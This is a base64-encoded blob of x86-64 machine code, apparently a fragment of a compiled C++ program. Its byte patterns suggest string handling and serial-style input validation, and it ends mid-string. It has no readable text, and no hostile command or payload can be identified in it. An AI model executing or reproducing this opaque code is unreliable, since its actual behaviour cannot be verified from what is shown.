GP///4lCPEiNRaBIicfoae7//+scidNJicRIjUWgSInH6Fbu//9MieBIY9PpGAEAAEiNRbBIjZ0w////uQMAAAC6AAAAAEiJ3kiJx+j77P//SI1VsEiNhTD///9IidZIicfoVfD//+scidNJicRIjUWwSInH6ALu//9MieBIY9PpxAAAAEiNRbBIicfo6+3//0iNhTD///9Iicfo3Oz//0iLlRj///9Ig8JASInGSInX6Nbu//9IjUXASI2dQP///7kPAAAAugAAAABIid5Iicfoduz//0iNVcBIjYVA////SInWSInH6NDv///rGYnTSYnESI1FwEiJx+h97f//TIngSGPT60JIjUXASInH6Gnt//9IjYVA////SInH6Frs//9Ii5UY////SIPCaEiJxkiJ1+hU7v//SI2FMP///0iJx+g17f//6ziJ00mJxEiNhTD///9IicfoH+3//0yJ4Ehj0+sAidNJicRIjYVA////SInH6APt//9MieBIY9PrEUiNhUD///9Iicfo7Oz//+scidNJicRIjYVQ////SInH6Nbs//9MieBIY9PrEUiNhVD///9Iicfov+z//+scidNJicRIjYVg////SInH6Kns//9MieBIY9PrEUiNhWD///9Iicfokuz//+scidNJicRIjYVw////SInH6Hzs//9MieBIY9PrEUiNhXD///9IicfoZez//+sNSInH6Cvu///o9u3//7sBAAAA6x+J00mJxEiNRYBIicfoPuz//0yJ4Ehj00iJx+hg7v/
/SI1FgEiJx+gk7P//idhIgcTgAAAAW0FcycNVSInlQVRTSIHs8AgAAEiJvRj3//9IibUQ9///SIuFGPf//w+2AITAdQq7/////+kqBAAASI2FIP///0iJx+jd8f//SI1FsEiJx+gn6v//SIuFGPf//w+2AIhF3kiLhRj3//9Ig8ABD7YAiEXfx0XgAAAAAMdF5AAAAADrI4tN4ItF5InAD7aEBSD///+JwonIiJQFIPf//4NF4AGDReQBg33kOw+WwITAddLHRegAAAAA6zSLTeCLRehIA4UQ9///D7YAicKJyIiUBSD3//+DReABi0XoSAOFEPf//w+2AITAdBGDRegBg33ofw+WwITAdcHrAZDHRewAAAAA61CLTeyLReyJwA+2hAUg9///icIyVd6JyIiUBSD3//8PtlXeD7ZF3g+v0InQAcAB0I1QCg+2Rd+JhQz3//+J0MH6H/e9DPf//4nQiEXeg0XsAYtF7DtF4A+SwITAdaNIjUWgi1XgSI2NIPf//0iJzkiJx+hF7v//SI1Fz0iJx+iV7P//SI1Vz0iLjRj3//9IjUXASInOSInH6Mvq//9IjVWwSI1FwL4AAAAASInH6Ow3AADrGYnTSYnESI1FwEiJx+hT6v//TIngSGPT6w5IjUXASInH6D/q///rHInTSYnESI1Fz0iJx+gs6///TIngSGPT6bwAAABIjUXPSInH6BXr//++EAAAAL8EAAAA6OA2AACJw0iNRbBIicfo+Oj//0iJwUiNhSD9//+J2kiJzkiJx+hx6///SI2FIP3//0iJx+gy6///hMB0WItF4AHAicNIjUWgSInH6Lvo//9IicFIjYUg/f//SInaSInOSInH6JPp//9IjYUg/f//SInH6FTq///rHInTSYnESI2FIP3//0iJx+gO6v//TIngSGPT6xFIjYUg/f//SInH6Pfp///rDUiJx+gt6///6Pjq//9IjUXdSInH6Ezr//9IjVXdSIuNGPf//0iNRdBIic5Iicfogun//0iNVbBIjUXQvgEAAABIicfoozYAAOsZidNJicRIjUXQSInH6Arp//9MieBIY9PrDkiNRdBIicfo9uj//+scidNJicRIjUXdSInH6OPp//9MieBIY9PpvAAAAEiNRd1IicfozOn//74QAAAAvwQAAADolzUAAInDSI1FsEiJx+iv5///SInBSI2FIPv//4naSInOSInH6Cjq//9IjYUg+///SInH6Onp//+EwHRYi0XgAcCJw0iNRaBIicfocuf//0iJwUiNhSD7//9IidpIic5IicfoSuj//0iNhSD7//9IicfoC+n//+scidNJicRIjYUg+///SInH6MXo//9MieBIY9PrEUiNhSD7//9Iicforuj//+sNSInH6OTp///or+n//7sAAAAASI1FoEiJx+j+5///6ziJ00mJxEiNRaBIicfo6+f//0yJ4Ehj0+sAidNJicRIjUWwSInH6NLn//9MieBIY9NIicfo9On//0iNRbBIicfouOf//4nYSIHE8AgAAFtBXMnDVUiJ5Yl9/Il1+IlV9IlN8ESJRexEiU3ouAEAAADJw1VIieWJffyJdfiJVfSJTfBEiUXsRIlN6ItF/IPgAYXAdSiLRfSLVfiNBAILRfyLVeyLTfCNFBExwotF6A+vRRAPr8Il/wAAAOsbi0X4D69F9ANF7ANF8ANF6ANFEAtF/CX/DwAAycNVSInliX38iXX4iVX0iU3wRIlF7ESJTei4AQAAAMnDVUiJ5Yl9/Il1+IlV9IlN8ESJRexEiU3ouAEAAADJw1VIieWJffyJdfiJVfSJTfBEiUXsRIlN6LgBAAAAycNVSInliX3siXXoxkX7AMdF/AAAAADrN4tF/EiYSMHgBIuAsG5AADtF7HUfi0X8SJhIweACSIPAAYsEhbBuQAA7Reh1BsZF+wHrDoNF/AGLRfzB6B+EwHW/D7ZF+8nDVUiJ5Yl97Il16IlV5IlN4MZF+wD
HRfwAAAAA62OLRfxImEjB4ASLgLBuQAA7Rex1S4tF/EiYSMHgAkiDwAGLBIWwbkAAO0XodTKLRfxImEgBwEiDwAGLBMWwbkAAO0XkdRqLRfxImEjB4ASLgLxuQAA7ReB1BsZF+wHrDoNF/AGLRfzB6B+EwHWTD7ZF+8nDVUiJ5Yl97Il16ItV7InQweACAdABwInCwfof933oiUX0i0X0D69F6IlF9ItN9LpnZmZmicj36sH6AonIwfgfidEpwYnIiUX0i0X0i1XsidEpwYnIiUX0g0X0AYtF9GnAQEIPAIlF+ItF9GnAQEIPAIlF/ItF+ItV/InRKcGJyIP4AX4Eg0X0AYtF9MnDVUiJ5UFUU0iD7FBIifuJdayLVaxIjUWwvuNsQABIice4AAAAAOhC5f//SI1F70iJx+gW5///SInYSI1V70iNTbBIic5IicfoUOX//+sfidNJicRIjUXvSInH6O3l//9MieBIY9NIicfoD+f//0iNRe9Iicfo0+X//0iJ2EiJ2EiDxFBbQVzJw1VIieVBVFNIg+xQSIn7SIl1qEiLVahIjUWwvuZsQABIice4AAAAAOi45P//SI1F70iJx+iM5v//SInYSI1V70iNTbBIic5IicfoxuT//+sfidNJicRIjUXvSInH6GPl//9MieBIY9NIicfoheb//0iNRe9IicfoSeX//0iJ2EiJ2EiDxFBbQVzJw1VIieVBVFNIg+wgSIn7iXXci1XcSI1F4L7rbEAASInHuAAAAADoMOT//0iNRe9IicfoBOb//0iJ2EiNVe9IjU3gSInOSInH6D7k///rH4nTSYnESI1F70iJx+jb5P//TIngSGPTSInH6P3l//9IjUXvSInH6MHk//9IidhIidhIg8QgW0FcycNVSInlQVVBVFNIg+woSIn7SIl1yEiJ2EiLVchIidZIicfoDOP//0iLRchIicfosOL//4lF3OtPSItFyEiJx+if4v//i1XcSGPSSInBSCnRSInKSInYSInWSInH6MLj//9JicSLRdyD6AFIY9BIi0XISInWSInH6Kfj//8PtgBBiAQkg23cAYN93AAPn8CEwHWm6x9BidRJicVIidhIicfoDuP//0yJ6Elj1EiJx+gw5f//SInYSInYSIPEKFtBXEFdycNVSInlQVRTSIPsMEiJ+0iJdciJVcREi2XESItFyEiJx+j64f//STnED5fAhMAPhOUAAABIjUXnSInH6LDk//9IjVXnSI1F0L7AbEAASInH6Ovi///rH4nTSYnESI1F50iJx+iI4///TIngSGPTSInH6Krk//9IjUXnSInH6G7j//9Ii0XISInH6JLh//+LVcSJ0SnBiciJRejHRewAAAAA6xVIjUXQvu5sQABIicfozOD//4NF7AGLRew7RegPnMCEwHXeSItVyEiNRdBIidZIicfoSOL//0iJ2EiNVdBIidZIicfohuH//+sfidNJicRIjUXQSInH6PPh//9MieBIY9NIicfoFeT//0iNRdBIicfo2eH//+sSSInYSItVyEiJ1kiJx+hF4f//SInYSInYSIPEMFtBXMnDVUiJ5VNIg+woifhIiXXQiEXcx0XsAAAAAOs+i1XsSItF0EiJ1kiJx+j54f//D7YAOkXcD5TAhMB0G4tF7EiLVdBIg8IISInGSInX6Nbh//8PtgDrIoNF7AGLXexIi0XQSInH6H7g//9IOcMPksCEwHWpuAAAAABIg8QoW8nDVUiJ5UFVQVRTSIPsWEiJ+4l1rEiJVaCJTZxEi2WcSI1FwItVrInWSInH6M/8//9IjUWwSI1NwESJ4kiJzkiJx+gE/v//6x+J00mJxEiNRcBIicfo4OD//0yJ4Ehj00iJx+gC4///SI1FwEiJx+jG4P//SYncSI1F10iJx+i34v//SI1F10iJwr7AbEAATInn6PPg///rHInTSYnESI1F10iJx+iQ4f//TIngSGPT6YgAAABIjUXXSInH6Hnh///
HRdgAAAAA6z6LVdhIjUWwSInWSInH6M7g//8PtgAPvsBIi1WgSInWicfolP7//4hF3w++Vd9IidiJ1kiJx+gm4v//g0XYAUSLZdhIjUWwSInH6FLf//9JOcQPksCEwHWo6zhBidRJicVIidhIicfoBeD//0yJ6Elj1OsAidNJicRIjUWwSInH6Ozf//9MieBIY9NIicfoDuL//0iNRbBIicfo0t///0iJ2EiJ2EiDxFhbQVxBXcnDVUiJ5UFXQVZBVUFUU0iB7JgAAABIifuJtXz///+JlXj///+JjXT///9MiYVo////TImNYP///4tFEIiFXP///0iNRaCLlXz///+J1kiJx+gh+v//SI1FoEiJx+iR3v//SIP4BQ+WwITAdFJJidxIjUWySInH6Efh//9IjUWySInCvsBsQABMiefog9///+scidNJicRIjUWySInH6CDg//9MieBIY9PpbgIAAEiNRbJIicfoCeD//+l8AgAASI1FoL4AAAAASInH6GPf//8PtgAPvsCD6DCJRbRIjUWgvgEAAABIicfoRt///w+2AA++wIPoMIlFuEiNRaC+AgAAAEiJx+gp3///D7YAD77Ag+gwiUW8SI1FoL4DAAAASInH6Azf//8PtgAPvsCD6DCJRcBIjUWgvgQAAABIicfo797//w+2AA++wIPoMIlFxEiNRaC+BQAAAEiJx+jS3v//D7YAD77Ag+gwiUXITI1lkE2J5kG9AQAAAEiNRbNIicfoPeD//0iNRbNIicK+8GxAAEyJ9+h53v//6xmJ00mJxkiNRbNIicfoFt///0yJ8Ehj0+t+SI1Fs0iJx+gC3///SY1WCEmD7QGLhXT///+D6AGJwEjB4ANIA4Vg////SInGSInX6Fnd//+LhXT///+D6AGJwEjB4ANIA4Vo////TIsQi33IRItNxESLRcCLTbyLVbiLdbSLhXj///+JPCSJx0H/0olFzIC9XP///wB0U+s5QYnWSYnHTYXkdCO4AQAAAEwp6EjB4ANJjRwETDnjdA5Ig+sISInf6GTd///r7UyJ+Elj1umwAAAASI1FgItNGEiNVZCLdcxIicfoCfz//+sRSI1FgItVzInWSInH6OL3//9IidhIjVWASInWSInH6Jzc///rGYnTSYnESI1FgEiJx+gJ3f//TIngSGPT6w5IjUWASInH6PXc///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EAolF5ItF5EiDxDhbycNVSInlQVRTSIHskAAAAEiJvWj///+JtWT///9Ii4Vo////ugAAAAC+AW1AAEiJx+hG2f//SIlF2EiLRdhIjVABSIuFaP///74BbUAASInH6CbZ//9IiUXgSIN92P90B0iDfeD/dQq7AAAAAOkiAgAASI1FsEiLVdhIi51o////SInRugAAAABIid5IicfoSNX//0iLRdhIi1XgSInRSCnBSInISI1I/kiLRdhIjVACSI1FoEiLnWj///9Iid5IicfoFdX//0iLhWj///9IicfoZtX//0iJwkiLReBIjXACSI1FkEiLnWj///9IidFIifJIid5Iicfo39T//0iNRYBIjVWgSI1NsEiJzkiJx+gtJgAASI2FcP///0iNVZBIjU2gSInOSInH6BMmAABIjZVw////SI1FwEiJ1kiJx+hI1f//SI1VgEiNRdBIidZIicfoNdX//0iNVcBIjUXQSInWSInH6EX9//+LlWT////R6g+vwolF7EiNRdBIicfoiNX//+syidNJicRIjUXQSInH6HXV//9MieBIY9PrAInTSYnESI1FwEiJx+hc1f//TIngSGPT6yBIjUXASInH6EjV//+LXexIjYVw////SInH6DbV///rNYnTSYnESI2FcP///0iJx+gg1f//TIngSGPT6wCJ00mJxEiNRYBIicfoB9X//0yJ4Ehj0+sOSI1FgEiJx+jz1P//6xmJ00mJxEiNRZBIicfo4NT//0yJ4Ehj0+sOSI1FkEiJx+jM1P//6xmJ00mJxEiNRaB
IicfoudT//0yJ4Ehj0+sOSI1FoEiJx+il1P//6x+J00mJxEiNRbBIicfoktT//0yJ4Ehj00iJx+i01v//SI1FsEiJx+h41P//idhIgcSQAAAAW0FcycNVSInlQVRTSIHskAAAAEiJfYhIiXWASImVeP///0iJjXD///9MiYVo////SIuFaP///7oAAAAAvuFsQABIicfoltb//0iJRdBIi0XQSI1QAUiLhWj///++4WxAAEiJx+h21v//SIlF2EiLRdhIjVABSIuFaP///77hbEAASInH6FbW//9IiUXgSItF4EiNUAFIi4Vo////vuFsQABIicfoNtb//0iJRehIg33Q/3UISMdF0AAAAABIg33Y/3UISMdF2AAAAABIg33g/3UISMdF4AAAAABIg33o/3UISMdF6AAAAABIg33QAHUfSIN92AB1GEiDfeAAdRFIg33oAHUKuAAAAADpyQEAAEiNRZBIi1XQSIudaP///0iJ0boAAAAASIneSInH6A7S//9IjVWQSItFiEiJ1kiJx+hr1f//6x+J00mJxEiNRZBIicfoGNP//0yJ4Ehj00iJx+g61f//SI1FkEiJx+j+0v//SItF0EiLVdhIidFIKcFIichIjUj/SItF0EiNUAFIjUWgSIudaP///0iJ3kiJx+ib0f//SI1VoEiLRYBIidZIicfo+NT//+sfidNJicRIjUWgSInH6KXS//9MieBIY9NIicfox9T//0iNRaBIicfoi9L//0iLRdhIi1XgSInRSCnBSInISI1I/0iLRdhIjVABSI1FsEiLnWj///9Iid5IicfoKNH//0iNVbBIi4V4////SInWSInH6ILU///rH4nTSYnESI1FsEiJx+gv0v//TIngSGPTSInH6FHU//9IjUWwSInH6BXS//9Ii4Vo////SInH6DbR//9IicJIi0XgSI1wAUiNRcBIi51o////SInRSInySIneSInH6K/Q//9IjVXASIuFcP///0iJ1kiJx+gJ1P//6x+J00mJxEiNRcBIicfottH//0yJ4Ehj00iJx+jY0///SI1FwEiJx+ic0f//uAEAAABIgcSQAAAAW0FcycNVSInlQVdBVkFVQVRTSIPseEiJvXj///+JtXT////pzAAAAEiNRb5IicfoXNP//0iNVb5IjUWwvu5sQABIicfol9H//0iNRaBIi5V4////SI1NsEiJzkiJx+hiIQAASI1VoEiLhXj///9IidZIicfoV9P//+sZidNJicRIjUWgSInH6ATR//9MieBIY9PrDkiNRaBIicfo8ND//+sZidNJicRIjUWwSInH6N3Q//9MieBIY9PrDkiNRbBIicfoydD//+sfidNJicRIjUW+SInH6LbR//9MieBIY9NIicfo2NL//0iNRb5IicfonNH//0iLhXj///9Iicfovc///0iD+AkPlsCEwA+FFv///0iLhXj///9Iicfon8///0iJw0iNQwFIweADSInH6GzP//9JicRMieBIiRhMieBMjWgITYnvSI1D/0mJxusQTIn/6JjO//9Jg8cISYPuAUmD/v8PlcCEwHXl61dBiddIiYVo////TYXtdCNIjUP/TCnwSMHgA0mNXAUATDnrdA5Ig+sISInf6PPP///r7UiLhWj///9JY9eJ00mJxUyJ5+ga0f//TInoSGPTSInH6PzR//9MieBIg8AISIlFwMdFyP/////HRcwAAAAA6e0AAACLjXT///+LRcy6AAAAAPfxidCFwHUZg0XIAYtFyEiYSMHgA0gDRcBIicfoL87//2bHRZAAAItVzEiLhXj///9IidZIicfo1M///w+2AIhFkEiNRb9IicfoUtH//0iNVb9IjU2QSI1FgEiJzkiJx+iLz///6x+J00mJxEiNRb9IicfoKND//0yJ4Ehj00iJx+hK0f//SI1Fv0iJx+gO0P//i0XISJhIweADSANFwEiNVYBIidZIicfoIs///+sfidNJicRIjUWASIn
H6N/O//9MieBIY9NIicfoAdH//0iNRYBIicfoxc7//4NFzAGLXcxIi4V4////SInH6N/N//9IOcMPksCEwA+F8/7//0iLRcBIg8R4W0FcQV1BXkFfycNVSInlU0iD7BhIiftIiXXoiVXkiU3gSInYi1XgSGPKi1Xkg+oBD69V4Ehj0kiLdehIicfoJs3//0iJ2EiJ2EiDxBhbycNVSInlQVZBVUFUU0iB7JADAABIib1o/P//ibVk/P//SI2FH/7//0iJx+gb0P//SIuFaPz//0iJx+gMzf//SInBSI2VH/7//0iNhRD+//9Iic5IicfoQM7//+siidNJicRIjYUf/v//SInH6NrO//9MieBIY9NIicfo/M///0iNhR/+//9Iicfovc7//0iNhQD+//9IicfoDsz//0iNhfD9//9Iicfo/8v//0iNheD9//9Iicfo8Mv//0iNhdD9//9Iicfo4cv//4G9ZPz//5+GAQB/CrsAAAAA6ZATAABIjbUQ/v//SI2N0P3//0iNleD9//9IjZ3w/f//SI2FAP7//0mJ8EiJ3kiJx+jQ+P//g/ABhMB0CrsAAAAA6U4TAABIjYXQ/f//SInH6ErM//9IjVDxSI2FwP3//0iNndD9//9IidG6DwAAAEiJ3kiJx+jFy///SI2VwP3//0iNhSD+//9IidZIicfoXMz//0iNhSD+//9IicfoafD//4nDg/MBSI2FIP7//0iJx+i5zP//6x+J00mJxEiNhSD+//9Iicfoo8z//0yJ4Ehj0+l0EgAAhNt0CrsAAAAA6YISAABIjYWw/f//SI2d0P3//7kBAAAAug4AAABIid5IicfoN8v//0iNhaD9//9IjZ3Q/f//uQIAAAC6DAAAAEiJ3kiJx+gUy///SI2FMP7//0iNndD9//+5DAAAALoAAAAASIneSInH6PHK//9IjZUw/v//SI2F0P3//0iJ1kiJx+hIzv//6x+J00mJxEiNhTD+//9Iicfo8sv//0yJ4Ehj0+lpEQAASI2FMP7//0iJx+jYy///SI2VwP3//0iNhUD+//9IidZIicfoP8v//0iNhXD+//9IjZXw/f//SI2NAP7//0iJzkiJx+jUGwAASI2FYP7//0iNldD9//9IjY1w/v//SInOSInH6LQbAABIjYVQ/v//SI2V4P3//0iNjWD+//9Iic5IicfolBsAAEiNlUD+//9IjYVQ/v//SInWSInH6Ony//+JwkiNhZD9//+J1kiJx+jn5f//6xyJ00mJxEiNhVD+//9IicfoHcv//0yJ4Ehj0+stSI2FUP7//0iJx+gGy///6ziJ00mJxEiNhZD9//9Iicfo8Mr//0yJ4Ehj0+sAidNJicRIjYVg/v//SInH6NTK//9MieBIY9PrLUiNhWD+//9Iicfovcr//+s4idNJicRIjYWQ/f//SInH6KfK//9MieBIY9PrAInTSYnESI2FcP7//0iJx+iLyv//TIngSGPT6y1IjYVw/v//SInH6HTK///rO4nTSYnESI2FkP3//0iJx+heyv//TIngSGPT6wCJ00mJxEiNhUD+//9IicfoQsr//0yJ4Ehj0+m5DwAASI2FQP7//0iJx+goyv//SI2FkP3//0iJx+jJyf//SI1Q/kiNhYD+//9IjZ2Q/f//uQIAAABIid5Iicfox8j//0iNlYD+//9IjYWQ/f//SInWSInH6B7M///rH4nTSYnESI2FgP7//0iJx+jIyf//TIngSGPT6RIPAABIjYWA/v//SInH6K7J//9IjYWg/f//SInH6J/I//9Iicfo18n//0iJw0iNhZD9//9Iicfohcj//0iJx+i9yf//SDnDD5XAhMB0CrsAAAAA6doOAABIjYWA/f//SI2d0P3//7kCAAAAugAAAABIid5IicfoFsj//0iNhYD9//9IicfoN8j//0iJx+ivyf//iUW4SI2VwP3//0iNhZD+//9IidZIicfok8j//0iNhbD+//9IjZX
w/f//SI2NAP7//0iJzkiJx+goGQAASI2FoP7//0iNleD9//9IjY2w/v//SInOSInH6AgZAABIjZWQ/v//SI2FoP7//0iJ1kiJx+hd8P//iUW8SI2FoP7//0iJx+ioyP//6ziJ00mJxEiNhaD+//9Iicfoksj//0yJ4Ehj0+sAidNJicRIjYWw/v//SInH6HbI//9MieBIY9PrEUiNhbD+//9IicfoX8j//+sfidNJicRIjYWQ/v//SInH6EnI//9MieBIY9PpZg0AAEiNhZD+//9IicfoL8j//0iNlcD9//9IjYXA/v//SInWSInH6JbH//9IjYXw/v//SI2V8P3//0iNjQD+//9Iic5IicfoKxgAAEiNheD+//9IjZXg/f//SI2N8P7//0iJzkiJx+gLGAAASI2F0P7//0iNldD9//9IjY3g/v//SInOSInH6OsXAABIjZXA/v//SI2F0P7//0iJ1kiJx+hA7///iUXASI2F0P7//0iJx+iLx///6ziJ00mJxEiNhdD+//9Iicfodcf//0yJ4Ehj0+sAidNJicRIjYXg/v//SInH6FnH//9MieBIY9PrEUiNheD+//9IicfoQsf//+scidNJicRIjYXw/v//SInH6CzH//9MieBIY9PrEUiNhfD+//9IicfoFcf//+sfidNJicRIjYXA/v//SInH6P/G//9MieBIY9PpHAwAAEiNhcD+//9Iicfo5cb//0iNheD9//++AAAAAEiJx+hBx///D7YARA++4EiNhfD9//++AAAAAEiJx+gmx///D7YAD77Qi0XAi124RInhid6Jx+g14P//hMB0CrsAAAAA6dQLAACLlWT8//9IjYUA////idZIicfoLeH//0iNhQD///++AAAAAEiJx+jVxv//D7YAiIVg/f//SI2FAP///0iJx+hNxv//6x+J00mJxEiNhQD///9IicfoN8b//0yJ4Ehj0+lUCwAAxoVh/f//AEiNhWD9//9Iicfolsb//4nCSI2FcP3//74EbUAASInHuAAAAADoG8b//0iNhQ////9Iicfo7Mf//0iNlQ////9IjY1w/f//SI2FUP3//0iJzkiJx+gcxv//6x+J00mJxEiNhQ////9Iicfotsb//0yJ4Ehj0+nTCgAASI2FD////0iJx+icxv//SI2FUP3//0iJx+iNxP//SInH6AXG//+JRcSLVcSLRbiJ1onH6Jrf//+JRchIjYXQ/f//SInH6JHE//9IjVD+SI2FEP///0iNndD9//9IidG6AgAAAEiJ3kiJx+gMxP//SI2VEP///0iNhdD9//9IidZIicfoY8f//+sfidNJicRIjYUQ////SInH6A3F//9MieBIY9Pp/QkAAEiNhRD///9Iicfo88T//0iNldD9//9IjYUw////SInWSInH6FrE//9IjYUg////SI2VMP///0iJ1kiJx+gP4f//SI2VIP///0iNhdD9//9IidZIicfo6Mb//+scidNJicRIjYUg////SInH6JLE//9MieBIY9PrEUiNhSD///9Iicfoe8T//+sfidNJicRIjYUw////SInH6GXE//9MieBIY9PpVQkAAEiNhTD///9IicfoS8T//0iNhUD9//9IicfonML//0iNhTD9//9IicfojcL//0iNnUD9//9IjY0w/f//i1XISI2F0P3//0mJ2L4EAAAASInH6LHo//+JRcxIjYUg/f//i1XMidZIicfoot7//0iNhSD9//9IicfoD8P//0iNUP9IjYVA////SI2dIP3//7kBAAAASIneSInH6I3C//9IjZVA////SI2FIP3//0iJ1kiJx+jkxf//6x+J00mJxEiNhUD///9IicfojsP//0yJ4Ehj0+n3BwAASI2FQP///0iJx+h0w///SI2FsP3//0iJx+hlwv//SInDSI2FIP3//0iJx+hTwv//SIneSInH6DjE//+FwA+VwITAdAq7AAAAAOnFBwAASI2VQP3//0i
NhWD///9IidZIicfonML//0iNhVD///9IjZVg////SInWSInH6FHf//9IjZVQ////SI2FQP3//0iJ1kiJx+gqxf//6xyJ00mJxEiNhVD///9Iicfo1ML//0yJ4Ehj0+sRSI2FUP///0iJx+i9wv//6x+J00mJxEiNhWD///9Iicfop8L//0yJ4Ehj0+kQBwAASI2FYP///0iJx+iNwv//SI2FMP3//0iJx+iuwf//SI1Q/0iNhXD///9IjZ0w/f//SInRugEAAABIid5IicfoKcH//0iNRZBIjZ0w/f//uQEAAAC6AAAAAEiJ3kiJx+gJwf//SI1FgEiNlUD9//9IjU2QSInOSInH6FQSAABIjYUQ/f//SI2VcP///0iNTYBIic5IicfoNxIAAOsZidNJicRIjUWASInH6O/B//9MieBIY9PrKkiNRYBIicfo28H//+s1idNJicRIjYUQ/f//SInH6MXB//9MieBIY9PrAInTSYnESI1FkEiJx+iswf//TIngSGPT6ypIjUWQSInH6JjB///rO4nTSYnESI2FEP3//0iJx+iCwf//TIngSGPT6wCJ00mJxEiNhXD///9IicfoZsH//0yJ4Ehj0+nPBQAASI2FcP///0iJx+hMwf//i1W8i4Vk/P//SJhID6/CSIlF0EiNhQD9//9Ii1XQSInWSInH6F/c//9IjZUA/f//SI1FoEiJ1kiJx+iNwP//SI1FoL4CAAAASInH6HHv//9IiUXYSI1FoEiJx+jswP//6xyJ00mJxEiNRaBIicfo2cD//0yJ4Ehj0+noBAAASMeFsPz//2YzQABIx4W4/P//hTNAAEjHhcD8///sM0AASMeFyPz//ws0QABIx4XQ/P//KjRAAEyNpXD8//9NieW7BgAAAEiNRalIicfofML//0iNRalIicK+CG1AAEyJ7+i4wP//6x1BidVJicZIjUWpSInH6FTB//9MifBJY9XpEAIAAEiNRalIicfoPcH//0mDxQhIg+sBSI1FqkiJx+gpwv//SI1FqkiJwr4ZbUAATInv6GXA///rHUGJ1UmJxkiNRapIicfoAcH//0yJ8Elj1em9AQAASI1FqkiJx+jqwP//SYPFCEiD6wFIjUWrSInH6NbB//9IjUWrSInCvghtQABMie/oEsD//+sdQYnVSYnGSI1Fq0iJx+iuwP//TInwSWPV6WoBAABIjUWrSInH6JfA//9Jg8UISIPrAUiNRaxIicfog8H//0iNRaxIicK+CG1AAEyJ7+i/v///6x1BidVJicZIjUWsSInH6FvA//9MifBJY9XpFwEAAEiNRaxIicfoRMD//0mDxQhIg+sBSI1FrUiJx+gwwf//SI1FrUiJwr4IbUAATInv6Gy////rHUGJ1UmJxkiNRa1IicfoCMD//0yJ8Elj1enEAAAASI1FrUiJx+jxv///SYPFCEiD6wFIjUWuSInH6N3A//9IjUWuSInCvghtQABMie/oGb///+saQYnVSYnGSI1FrkiJx+i1v///TInwSWPV63RIjUWuSInH6KG///9Jg8UISIPrAUiNRa9IicfojcD//0iNRa9IicK+CG1AAEyJ7+jJvv//6xpBidVJicZIjUWvSInH6GW///9MifBJY9XrJEiNRa9IicfoUb///0iNlRD9//9IjUWwSInWSInH6Lu9///rOUGJ1UmJxk2F5HQjuAYAAABIKdhIweADSY0cBEw543QOSIPrCEiJ3+gNvv//6+1MifBJY9XpGgIAAEiNhfD8//9IjV2wuQIAAAC6AgAAAEiJ3kiJx+hS7///6xyJ00mJxEiNRbBIicfozb3//0yJ4Ehj0+mEAQAASI1FsEiJx+i2vf//SItF2EiDwAhIicfoprz//0iJx+gevv//icKLnWT8//9IjYXg/P//SI21cPz//0iNjbD8///HRCQIAgAAAMcEJAEAAABJifFJici5AgAAAIneSInH6Jzd//9IjYXw/P//SInH6E6
